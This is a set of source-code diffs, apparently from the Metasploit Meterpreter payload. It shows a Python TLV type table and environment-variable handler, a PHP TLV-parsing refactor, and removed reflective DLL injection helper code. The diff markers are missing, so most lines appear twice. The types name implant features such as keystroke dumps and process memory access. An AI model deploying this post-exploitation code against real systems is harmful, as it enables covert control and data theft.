@ -86,170 +86,185 @@ TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
##
# General
##
TLV_TYPE_HANDLE = TLV_META_TYPE_UINT | 600
TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601
TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_UINT | 630
TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_UINT | 631
TLV_TYPE_HANDLE = TLV_META_TYPE_UINT | 600
TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601
TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_UINT | 630
TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_UINT | 631
##
# Fs
##
TLV_TYPE_DIRECTORY_PATH = TLV_META_TYPE_STRING | 1200
TLV_TYPE_FILE_NAME = TLV_META_TYPE_STRING | 1201
TLV_TYPE_FILE_PATH = TLV_META_TYPE_STRING | 1202
TLV_TYPE_FILE_MODE = TLV_META_TYPE_STRING | 1203
TLV_TYPE_FILE_SIZE = TLV_META_TYPE_UINT | 1204
TLV_TYPE_DIRECTORY_PATH = TLV_META_TYPE_STRING | 1200
TLV_TYPE_FILE_NAME = TLV_META_TYPE_STRING | 1201
TLV_TYPE_FILE_PATH = TLV_META_TYPE_STRING | 1202
TLV_TYPE_FILE_MODE = TLV_META_TYPE_STRING | 1203
TLV_TYPE_FILE_SIZE = TLV_META_TYPE_UINT | 1204
TLV_TYPE_STAT_BUF = TLV_META_TYPE_COMPLEX | 1220
TLV_TYPE_STAT_BUF = TLV_META_TYPE_COMPLEX | 1220
TLV_TYPE_SEARCH_RECURSE = TLV_META_TYPE_BOOL | 1230
TLV_TYPE_SEARCH_GLOB = TLV_META_TYPE_STRING | 1231
TLV_TYPE_SEARCH_ROOT = TLV_META_TYPE_STRING | 1232
TLV_TYPE_SEARCH_RESULTS = TLV_META_TYPE_GROUP | 1233
TLV_TYPE_SEARCH_RECURSE = TLV_META_TYPE_BOOL | 1230
TLV_TYPE_SEARCH_GLOB = TLV_META_TYPE_STRING | 1231
TLV_TYPE_SEARCH_ROOT = TLV_META_TYPE_STRING | 1232
TLV_TYPE_SEARCH_RESULTS = TLV_META_TYPE_GROUP | 1233
##
# Net
##
TLV_TYPE_HOST_NAME = TLV_META_TYPE_STRING | 1400
TLV_TYPE_PORT = TLV_META_TYPE_UINT | 1401
TLV_TYPE_HOST_NAME = TLV_META_TYPE_STRING | 1400
TLV_TYPE_PORT = TLV_META_TYPE_UINT | 1401
TLV_TYPE_SUBNET = TLV_META_TYPE_RAW | 1420
TLV_TYPE_NETMASK = TLV_META_TYPE_RAW | 1421
TLV_TYPE_GATEWAY = TLV_META_TYPE_RAW | 1422
TLV_TYPE_NETWORK_ROUTE = TLV_META_TYPE_GROUP | 1423
TLV_TYPE_SUBNET = TLV_META_TYPE_RAW | 1420
TLV_TYPE_NETMASK = TLV_META_TYPE_RAW | 1421
TLV_TYPE_GATEWAY = TLV_META_TYPE_RAW | 1422
TLV_TYPE_NETWORK_ROUTE = TLV_META_TYPE_GROUP | 1423
TLV_TYPE_IP = TLV_META_TYPE_RAW | 1430
TLV_TYPE_MAC_ADDRESS = TLV_META_TYPE_RAW | 1431
TLV_TYPE_MAC_NAME = TLV_META_TYPE_STRING | 1432
TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
TLV_TYPE_IP = TLV_META_TYPE_RAW | 1430
TLV_TYPE_MAC_ADDRESS = TLV_META_TYPE_RAW | 1431
TLV_TYPE_MAC_NAME = TLV_META_TYPE_STRING | 1432
TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442
TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443
TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444
TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442
TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443
TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444
##
# Socket
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
TLV_TYPE_CONNECT_RETRIES = TLV_META_TYPE_UINT | 1504
##
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
TLV_TYPE_CONNECT_RETRIES = TLV_META_TYPE_UINT | 1504
TLV_TYPE_SHUTDOWN_HOW = TLV_META_TYPE_UINT | 1530
TLV_TYPE_SHUTDOWN_HOW = TLV_META_TYPE_UINT | 1530
##
# Registry
TLV_TYPE_HKEY = TLV_META_TYPE_UINT | 1000
TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY
TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001
TLV_TYPE_PERMISSION = TLV_META_TYPE_UINT | 1002
TLV_TYPE_KEY_NAME = TLV_META_TYPE_STRING | 1003
TLV_TYPE_VALUE_NAME = TLV_META_TYPE_STRING | 1010
TLV_TYPE_VALUE_TYPE = TLV_META_TYPE_UINT | 1011
TLV_TYPE_VALUE_DATA = TLV_META_TYPE_RAW | 1012
TLV_TYPE_TARGET_HOST = TLV_META_TYPE_STRING | 1013
##
TLV_TYPE_HKEY = TLV_META_TYPE_UINT | 1000
TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY
TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001
TLV_TYPE_PERMISSION = TLV_META_TYPE_UINT | 1002
TLV_TYPE_KEY_NAME = TLV_META_TYPE_STRING | 1003
TLV_TYPE_VALUE_NAME = TLV_META_TYPE_STRING | 1010
TLV_TYPE_VALUE_TYPE = TLV_META_TYPE_UINT | 1011
TLV_TYPE_VALUE_DATA = TLV_META_TYPE_RAW | 1012
TLV_TYPE_TARGET_HOST = TLV_META_TYPE_STRING | 1013
##
# Config
TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040
TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041
TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042
TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043
##
TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040
TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041
TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042
TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043
##
# Environment
##
TLV_TYPE_ENV_VARIABLE = TLV_META_TYPE_STRING | 1100
TLV_TYPE_ENV_VALUE = TLV_META_TYPE_STRING | 1101
TLV_TYPE_ENV_GROUP = TLV_META_TYPE_GROUP | 1102
DELETE_KEY_FLAG_RECURSIVE = (1 << 0)
##
# Process
TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_UINT | 2000
TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001
TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002
TLV_TYPE_PROCESS_PERMS = TLV_META_TYPE_UINT | 2003
TLV_TYPE_PROCESS_MEMORY = TLV_META_TYPE_RAW | 2004
TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_UINT | 2005
TLV_TYPE_MEMORY_STATE = TLV_META_TYPE_UINT | 2006
TLV_TYPE_MEMORY_TYPE = TLV_META_TYPE_UINT | 2007
TLV_TYPE_ALLOC_PROTECTION = TLV_META_TYPE_UINT | 2008
TLV_TYPE_PID = TLV_META_TYPE_UINT | 2300
TLV_TYPE_PROCESS_NAME = TLV_META_TYPE_STRING | 2301
TLV_TYPE_PROCESS_PATH = TLV_META_TYPE_STRING | 2302
TLV_TYPE_PROCESS_GROUP = TLV_META_TYPE_GROUP | 2303
TLV_TYPE_PROCESS_FLAGS = TLV_META_TYPE_UINT | 2304
TLV_TYPE_PROCESS_ARGUMENTS = TLV_META_TYPE_STRING | 2305
TLV_TYPE_PROCESS_ARCH = TLV_META_TYPE_UINT | 2306
TLV_TYPE_PARENT_PID = TLV_META_TYPE_UINT | 2307
##
TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_UINT | 2000
TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001
TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002
TLV_TYPE_PROCESS_PERMS = TLV_META_TYPE_UINT | 2003
TLV_TYPE_PROCESS_MEMORY = TLV_META_TYPE_RAW | 2004
TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_UINT | 2005
TLV_TYPE_MEMORY_STATE = TLV_META_TYPE_UINT | 2006
TLV_TYPE_MEMORY_TYPE = TLV_META_TYPE_UINT | 2007
TLV_TYPE_ALLOC_PROTECTION = TLV_META_TYPE_UINT | 2008
TLV_TYPE_PID = TLV_META_TYPE_UINT | 2300
TLV_TYPE_PROCESS_NAME = TLV_META_TYPE_STRING | 2301
TLV_TYPE_PROCESS_PATH = TLV_META_TYPE_STRING | 2302
TLV_TYPE_PROCESS_GROUP = TLV_META_TYPE_GROUP | 2303
TLV_TYPE_PROCESS_FLAGS = TLV_META_TYPE_UINT | 2304
TLV_TYPE_PROCESS_ARGUMENTS = TLV_META_TYPE_STRING | 2305
TLV_TYPE_PROCESS_ARCH = TLV_META_TYPE_UINT | 2306
TLV_TYPE_PARENT_PID = TLV_META_TYPE_UINT | 2307
TLV_TYPE_IMAGE_FILE = TLV_META_TYPE_STRING | 2400
TLV_TYPE_IMAGE_FILE_PATH = TLV_META_TYPE_STRING | 2401
TLV_TYPE_PROCEDURE_NAME = TLV_META_TYPE_STRING | 2402
TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_UINT | 2403
TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_UINT | 2404
TLV_TYPE_IMAGE_GROUP = TLV_META_TYPE_GROUP | 2405
TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406
TLV_TYPE_IMAGE_FILE = TLV_META_TYPE_STRING | 2400
TLV_TYPE_IMAGE_FILE_PATH = TLV_META_TYPE_STRING | 2401
TLV_TYPE_PROCEDURE_NAME = TLV_META_TYPE_STRING | 2402
TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_UINT | 2403
TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_UINT | 2404
TLV_TYPE_IMAGE_GROUP = TLV_META_TYPE_GROUP | 2405
TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406
TLV_TYPE_THREAD_ID = TLV_META_TYPE_UINT | 2500
TLV_TYPE_THREAD_PERMS = TLV_META_TYPE_UINT | 2502
TLV_TYPE_EXIT_CODE = TLV_META_TYPE_UINT | 2510
TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_UINT | 2511
TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_UINT | 2512
TLV_TYPE_CREATION_FLAGS = TLV_META_TYPE_UINT | 2513
TLV_TYPE_THREAD_ID = TLV_META_TYPE_UINT | 2500
TLV_TYPE_THREAD_PERMS = TLV_META_TYPE_UINT | 2502
TLV_TYPE_EXIT_CODE = TLV_META_TYPE_UINT | 2510
TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_UINT | 2511
TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_UINT | 2512
TLV_TYPE_CREATION_FLAGS = TLV_META_TYPE_UINT | 2513
TLV_TYPE_REGISTER_NAME = TLV_META_TYPE_STRING | 2540
TLV_TYPE_REGISTER_SIZE = TLV_META_TYPE_UINT | 2541
TLV_TYPE_REGISTER_VALUE_32 = TLV_META_TYPE_UINT | 2542
TLV_TYPE_REGISTER = TLV_META_TYPE_GROUP | 2550
TLV_TYPE_REGISTER_NAME = TLV_META_TYPE_STRING | 2540
TLV_TYPE_REGISTER_SIZE = TLV_META_TYPE_UINT | 2541
TLV_TYPE_REGISTER_VALUE_32 = TLV_META_TYPE_UINT | 2542
TLV_TYPE_REGISTER = TLV_META_TYPE_GROUP | 2550
##
# Ui
##
TLV_TYPE_IDLE_TIME = TLV_META_TYPE_UINT | 3000
TLV_TYPE_KEYS_DUMP = TLV_META_TYPE_STRING | 3001
TLV_TYPE_DESKTOP = TLV_META_TYPE_STRING | 3002
TLV_TYPE_IDLE_TIME = TLV_META_TYPE_UINT | 3000
TLV_TYPE_KEYS_DUMP = TLV_META_TYPE_STRING | 3001
TLV_TYPE_DESKTOP = TLV_META_TYPE_STRING | 3002
##
# Event Log
##
TLV_TYPE_EVENT_SOURCENAME = TLV_META_TYPE_STRING | 4000
TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_UINT | 4001
TLV_TYPE_EVENT_NUMRECORDS = TLV_META_TYPE_UINT | 4002
TLV_TYPE_EVENT_SOURCENAME = TLV_META_TYPE_STRING | 4000
TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_UINT | 4001
TLV_TYPE_EVENT_NUMRECORDS = TLV_META_TYPE_UINT | 4002
TLV_TYPE_EVENT_READFLAGS = TLV_META_TYPE_UINT | 4003
TLV_TYPE_EVENT_RECORDOFFSET = TLV_META_TYPE_UINT | 4004
TLV_TYPE_EVENT_READFLAGS = TLV_META_TYPE_UINT | 4003
TLV_TYPE_EVENT_RECORDOFFSET = TLV_META_TYPE_UINT | 4004
TLV_TYPE_EVENT_RECORDNUMBER = TLV_META_TYPE_UINT | 4006
TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT | 4007
TLV_TYPE_EVENT_TIMEWRITTEN = TLV_META_TYPE_UINT | 4008
TLV_TYPE_EVENT_ID = TLV_META_TYPE_UINT | 4009
TLV_TYPE_EVENT_TYPE = TLV_META_TYPE_UINT | 4010
TLV_TYPE_EVENT_CATEGORY = TLV_META_TYPE_UINT | 4011
TLV_TYPE_EVENT_STRING = TLV_META_TYPE_STRING | 4012
TLV_TYPE_EVENT_DATA = TLV_META_TYPE_RAW | 4013
TLV_TYPE_EVENT_RECORDNUMBER = TLV_META_TYPE_UINT | 4006
TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT | 4007
TLV_TYPE_EVENT_TIMEWRITTEN = TLV_META_TYPE_UINT | 4008
TLV_TYPE_EVENT_ID = TLV_META_TYPE_UINT | 4009
TLV_TYPE_EVENT_TYPE = TLV_META_TYPE_UINT | 4010
TLV_TYPE_EVENT_CATEGORY = TLV_META_TYPE_UINT | 4011
TLV_TYPE_EVENT_STRING = TLV_META_TYPE_STRING | 4012
TLV_TYPE_EVENT_DATA = TLV_META_TYPE_RAW | 4013
##
# Power
##
TLV_TYPE_POWER_FLAGS = TLV_META_TYPE_UINT | 4100
TLV_TYPE_POWER_REASON = TLV_META_TYPE_UINT | 4101
TLV_TYPE_POWER_FLAGS = TLV_META_TYPE_UINT | 4100
TLV_TYPE_POWER_REASON = TLV_META_TYPE_UINT | 4101
##
# Sys
@ -367,6 +382,18 @@ def stdapi_sys_config_getuid(request, response):
response += tlv_pack(TLV_TYPE_USER_NAME, getpass.getuser())
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_config_getenv(request, response):
for env_var in packet_enum_tlvs(request, TLV_TYPE_ENV_VARIABLE):
pgroup = ''
env_var = env_var['value'].translate(None, '%$')
env_val = os.environ.get(env_var)
if env_val:
pgroup += tlv_pack(TLV_TYPE_ENV_VARIABLE, env_var)
pgroup += tlv_pack(TLV_TYPE_ENV_VALUE, env_val)
response += tlv_pack(TLV_TYPE_ENV_GROUP, pgroup)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_config_sysinfo(request, response):
uname_info = platform.uname()

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@ -680,6 +680,30 @@ function tlv_pack($tlv) {
return $ret;
}
function tlv_unpack($raw_tlv) {
$tlv = unpack("Nlen/Ntype", substr($raw_tlv, 0, 8));
$type = $tlv['type'];
my_print("len: {$tlv['len']}, type: {$tlv['type']}");
if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
$tlv = unpack("Nlen/Ntype/a*value", substr($raw_tlv, 0, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
$tlv = unpack("Nlen/Ntype/Nvalue", substr($raw_tlv, 0, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
$tlv = unpack("Nlen/Ntype/cvalue", substr($raw_tlv, 0, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) {
$tlv = unpack("Nlen/Ntype", $raw_tlv);
$tlv['value'] = substr($raw_tlv, 8, $tlv['len']-8);
}
else {
my_print("Wtf type is this? $type");
$tlv = null;
}
return $tlv;
}
function packet_add_tlv(&$pkt, $tlv) {
$pkt .= tlv_pack($tlv);
}
@ -689,27 +713,10 @@ function packet_get_tlv($pkt, $type) {
# Start at offset 8 to skip past the packet header
$offset = 8;
while ($offset < strlen($pkt)) {
$tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8));
$tlv = tlv_unpack(substr($pkt, $offset));
#my_print("len: {$tlv['len']}, type: {$tlv['type']}");
if ($type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) {
#my_print("Found one at offset $offset");
if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
$tlv = unpack("Nlen/Ntype/a*value", substr($pkt, $offset, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
$tlv = unpack("Nlen/Ntype/Nvalue", substr($pkt, $offset, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
$tlv = unpack("Nlen/Ntype/cvalue", substr($pkt, $offset, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) {
$tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8));
$tlv['value'] = substr($pkt, $offset+8, $tlv['len']-8);
}
else {
my_print("Wtf type is this? $type");
$tlv = null;
}
return $tlv;
}
$offset += $tlv['len'];
@ -719,6 +726,27 @@ function packet_get_tlv($pkt, $type) {
}
function packet_get_all_tlvs($pkt, $type) {
my_print("Looking for all tlvs of type $type");
# Start at offset 8 to skip past the packet header
$offset = 8;
$all = array();
while ($offset < strlen($pkt)) {
$tlv = tlv_unpack(substr($pkt, $offset));
if ($tlv == NULL) {
break;
}
my_print("len: {$tlv['len']}, type: {$tlv['type']}");
if (empty($type) || $type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) {
my_print("Found one at offset $offset");
array_push($all, $tlv);
}
$offset += $tlv['len'];
}
return $all;
}
##
# Functions for genericizing the stream/socket conundrum
##

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@ -0,0 +1 @@
Subproject commit 88e8e5f109793f09b35cb17a621f33647d644103

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@ -1,116 +0,0 @@
//===============================================================================================//
// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "GetProcAddressR.h"
//===============================================================================================//
// We implement a minimal GetProcAddress to avoid using the native kernel32!GetProcAddress which
// wont be able to resolve exported addresses in reflectivly loaded librarys.
FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName )
{
UINT_PTR uiLibraryAddress = 0;
FARPROC fpResult = NULL;
if( hModule == NULL )
return NULL;
// a module handle is really its base address
uiLibraryAddress = (UINT_PTR)hModule;
__try
{
UINT_PTR uiAddressArray = 0;
UINT_PTR uiNameArray = 0;
UINT_PTR uiNameOrdinals = 0;
PIMAGE_NT_HEADERS pNtHeaders = NULL;
PIMAGE_DATA_DIRECTORY pDataDirectory = NULL;
PIMAGE_EXPORT_DIRECTORY pExportDirectory = NULL;
// get the VA of the modules NT Header
pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew);
pDataDirectory = (PIMAGE_DATA_DIRECTORY)&pNtHeaders->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)( uiLibraryAddress + pDataDirectory->VirtualAddress );
// get the VA for the array of addresses
uiAddressArray = ( uiLibraryAddress + pExportDirectory->AddressOfFunctions );
// get the VA for the array of name pointers
uiNameArray = ( uiLibraryAddress + pExportDirectory->AddressOfNames );
// get the VA for the array of name ordinals
uiNameOrdinals = ( uiLibraryAddress + pExportDirectory->AddressOfNameOrdinals );
// test if we are importing by name or by ordinal...
if( ((DWORD)lpProcName & 0xFFFF0000 ) == 0x00000000 )
{
// import by ordinal...
// use the import ordinal (- export ordinal base) as an index into the array of addresses
uiAddressArray += ( ( IMAGE_ORDINAL( (DWORD)lpProcName ) - pExportDirectory->Base ) * sizeof(DWORD) );
// resolve the address for this imported function
fpResult = (FARPROC)( uiLibraryAddress + DEREF_32(uiAddressArray) );
}
else
{
// import by name...
DWORD dwCounter = pExportDirectory->NumberOfNames;
while( dwCounter-- )
{
char * cpExportedFunctionName = (char *)(uiLibraryAddress + DEREF_32( uiNameArray ));
// test if we have a match...
if( strcmp( cpExportedFunctionName, lpProcName ) == 0 )
{
// use the functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// calculate the virtual address for the function
fpResult = (FARPROC)(uiLibraryAddress + DEREF_32( uiAddressArray ));
// finish...
break;
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
}
}
__except( EXCEPTION_EXECUTE_HANDLER )
{
fpResult = NULL;
}
return fpResult;
}
//===============================================================================================//

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@ -1,36 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
//===============================================================================================//
#include "ReflectiveDLLInjection.h"
FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName );
//===============================================================================================//
#endif
//===============================================================================================//

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//===============================================================================================//
// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
